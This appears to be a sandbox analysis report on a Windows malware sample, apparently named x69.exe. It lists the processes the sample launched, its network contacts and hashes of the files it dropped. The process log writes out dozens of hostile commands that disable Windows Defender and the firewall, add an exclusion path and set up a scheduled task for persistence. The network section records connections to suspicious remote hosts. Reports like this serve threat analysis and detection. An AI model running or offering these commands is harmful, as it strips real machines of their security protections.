powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{56e19c1a-5867-4201-a1b5-6d367e23986d}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c35e491-12b1-4996-a784-e152c28f1a1b}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\045b1cb4.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\771043f8.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\07c45773.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | grayhatgroupontop.zapto.org | udp |
| EG | 197.160.170.172:1177 | grayhatgroupontop.zapto.org | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
Files
memory/2884-0-0x00007FFC30773000-0x00007FFC30775000-memory.dmp
memory/2884-1-0x0000000000FC0000-0x000000000100E000-memory.dmp
memory/2884-2-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmjbhn5q.mt3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/856-12-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/856-13-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/856-14-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/856-15-0x0000022E2C5C0000-0x0000022E2C5E2000-memory.dmp
memory/856-18-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
C:\Users\Admin\AppData\Roaming\x69.exe
| MD5 | 143b1a26c0fdda10f74ba1b6249e020a |
| SHA1 | 30a01b28f4f205bc594f8d6665963eaa49d172e3 |
| SHA256 | 83f2f88a1de9b022867ba3659074b0c349e24d2de7d0e01e136a325a5d5eed65 |
| SHA512 | 06fca2ea01ce1828ae7f08c17d7ae111d75ae5b4c0c01c618a02551300bf25c7ad17abcb078eb0a4082bf74a052fcd3f8f63122251cf5884ec97099f495a9ce0 |
memory/464-25-0x0000000000FE0000-0x0000000000FF8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | a43e653ffb5ab07940f4bdd9cc8fade4 |
| SHA1 | af43d04e3427f111b22dc891c5c7ee8a10ac4123 |
| SHA256 | c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe |
| SHA512 | 62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | de5726e94ce7b4c3b1e45e1fe21335a8 |
| SHA1 | 0a9f73ff1d246b5f2f33529256fd0331bd3604b7 |
| SHA256 | fd897c8383327380c7c5cd1478072f08a37e338962f8e050638cef66cb619dea |
| SHA512 | 07a7b8748be25990dbabc854d3f9a0447b306809ee9bebe7c87a59bdde1a6cbc465c7274b53e6f04468bd2d77509459d04bc0193125fa02ad232c736131347dd |
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
| MD5 | 22d6b7ab5c8a05162d36d2981b715c28 |
| SHA1 | 7adc2e2c90b8dfcee0c34a86ad4d0cac79daf9f3 |
| SHA256 | f12428dc9c9f900d671d4135cfda52b7de9bfb6b34c5c336dbf88941db8575e1 |
| SHA512 | 374564a98cc8d663311cf27186aabf8b1e41f776c00f560c6d1d86758f7b6795b1b81651d414fa59af082e21c4e0fd1c475320e97f8e55942341a155c24138ce |
memory/1848-46-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
memory/4940-62-0x00000000001E0000-0x00000000001E9000-memory.dmp
memory/2884-61-0x00007FFC30773000-0x00007FFC30775000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a712aac4f8e841cc0464b6bc58cfeef |
| SHA1 | 11b9a76b9d4fa3044475711bd2e1df3dca33c9ff |
| SHA256 | a2e81157d9054f70120f4aca077b1e76270f2709267b469180ad6cf7ff2b489c |
| SHA512 | d91c2fc2b433177bf652d4ca2ee017df5974e1c93d0e6dc7840f70b126a2e67f4a66a13464f9968b857945175d08c56587455fd77f2d590a97c463599aee0fac |
C:\Users\Admin\AppData\Local\Temp\5DAE508D.exe
| MD5 | 69691c7bdcc3ce6d5d8a1361f22d04ac |
| SHA1 | c63ae6dd4fc9f9dda66970e827d13f7c73fe841c |
| SHA256 | 08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1 |
| SHA512 | 253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PK71DMPF\k1[2].rar
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat
| MD5 | 2df9441936169e60a9631bf730cd4273 |
| SHA1 | 979ee79524023a77b9577d077a3472b87fda9834 |
| SHA256 | 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e |
| SHA512 | ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee |
C:\Users\Admin\AppData\Roaming\x69install.exe
| MD5 | b89953da384c6a80b03e5b3abece33c9 |
| SHA1 | 8495ca680bc958f7b1c5525c2e92200fc9fa1864 |
| SHA256 | 5e515b4a674e11cb67492b05a96074b3c04c8171023d75301f61322837c53346 |
| SHA512 | 8466ada9ac155f358c99f3b14a7fd27e87dd73d017930f5870b817f214c1466f8d2dae9d121ef671e5771f0ea789397d554295da6403872017311b8c40c58963 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4f473e15a0686d0c819ad40b5f232368 |
| SHA1 | a769892ae2e8203e7d4a992a317189b56723da33 |
| SHA256 | 53d6c0d9a801d45fefdcec9b3ecf217fef683efc4e40ba9c72f0116ee4d20237 |
| SHA512 | d9b43132432078d5496688717253e58e7caab0dcbd20fc41fa8a718d11d699e93ee198f18be4243ed34bcf8912e1377888fe72ae5b26d920e765ab523f0bdf55 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0026cdd9bbc34b9de2447c0eb04c14b5 |
| SHA1 | ab7713fe5fbbb23031937dd1dc7d0fa238884ad4 |
| SHA256 | cf5a1c42641a83dd41fe89923591962b7ad189006342c7a67669239688f84a2d |
| SHA512 | 62aab723672e2731946f4bbf6a3d92609ff94384e324f3c50e803095529baf848ce2cd37219a059ced4c3f559e598bd9b900b9dd8aa0657adca6d845127797fe |
memory/2524-135-0x00000000009F0000-0x0000000000A21000-memory.dmp
memory/2956-136-0x00000000005F0000-0x00000000005F9000-memory.dmp
memory/2884-133-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
memory/2884-138-0x00007FFC30770000-0x00007FFC31231000-memory.dmp
C:\Program Files\7-Zip\Uninstall.exe
| MD5 | ddd5265a64cedb9fc9dce8841678d3a7 |
| SHA1 | 942afa202bb0aacb4c5b9b774905519d2dabfde8 |
| SHA256 | 63644fe64dfdb3789bfe1dd60e44792d05bf030f7a7ad72b74f828527d29d396 |
| SHA512 | 3888f28110294610da3d63d66b0b53a3068d2b28af3edd86726dce8863ee71583ab498aa8f31c7653d5c97c238aeb0386cf63c8b1e1c717d4e3a11b3a9c9f4e9 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log
| MD5 | bb6a89a9355baba2918bb7c32eca1c94 |
| SHA1 | 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2 |
| SHA256 | 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b |
| SHA512 | efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22310ad6749d8cc38284aa616efcd100 |
| SHA1 | 440ef4a0a53bfa7c83fe84326a1dff4326dcb515 |
| SHA256 | 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf |
| SHA512 | 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e2efbfd23e33d8d07d019bdd9ca20649 |
| SHA1 | 68d3b285c423d311bdf8dc53354f5f4000caf386 |
| SHA256 | f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828 |
| SHA512 | b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7cc007980e419d553568a106210549a |
| SHA1 | c03099706b75071f36c3962fcc60a22f197711e0 |
| SHA256 | a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165 |
| SHA512 | b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fd35037a4bce53228fc0c6f658209cfc |
| SHA1 | 17ce97a410f34a30e577e438b6602431caf90bd9 |
| SHA256 | 62d002ca5023ddb8272ecc8c735590f778c1f59b2ebc6fb5448c86e0d3770089 |
| SHA512 | 86f318f8c09b0316c91cf814ecee6f54e9a11c99a1150cf2f8864548d97d2488ab4d8ec3d731856d212c7ca4237da7bcb30fed4e7e4a1a2aa5649863f9d44263 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd1d0b083fedf44b482a028fb70b96e8 |
| SHA1 | dc9c027937c9f6d52268a1504cbae42a39c8d36a |
